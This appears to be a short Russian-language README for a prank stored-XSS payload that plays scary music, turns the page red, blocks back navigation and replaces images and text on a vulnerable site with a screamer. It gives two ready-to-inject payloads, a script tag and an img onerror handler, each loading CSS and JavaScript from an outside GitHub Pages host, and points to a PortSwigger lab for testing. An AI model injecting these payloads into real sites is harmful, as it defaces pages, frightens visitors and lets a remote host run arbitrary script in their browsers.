Код сработает только при наличии уязвимости хранимый XSS + если сайт не будет блокировать загрузку внешних скриптов и стилей.
Для теста можно запустить лабараторку в https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded.
xss-scary.mp4
- Страшная музыка.
- Постепенно изменяющийся цвет фона на красный.
- Прыгающий и мигающий текст.
- Нельзя вернуться на предыдущую страницу (зависит от браузера).
- Замена всех изображений на скример.
- Замена текста в тегах "p", "h1", "a".
- Замена всех тегов "a" на "p".
- Скример на весь экран с криком в течение какого-то времени.
Полная версия (JS + CSS):
Через тег "script" [288 символов]:
<script>var c=document.createElement('link');c.rel='stylesheet';c.href='//0-dayff13r.github.io/Stored-XSS-scary/styles.css';document.head.appendChild(c);var r=document.createElement('script');r.src='//0-dayff13r.github.io/Stored-XSS-scary/script.js';document.body.appendChild(r);</script>
Через тег "img" [300 символов]:
<img src="" alt="" onerror="var c=document.createElement('link');c.rel='stylesheet';c.href='//0-dayff13r.github.io/Stored-XSS-scary/styles.css';document.head.appendChild(c);var r=document.createElement('script');r.src='//0-dayff13r.github.io/Stored-XSS-scary/script.js';document.body.appendChild(r)">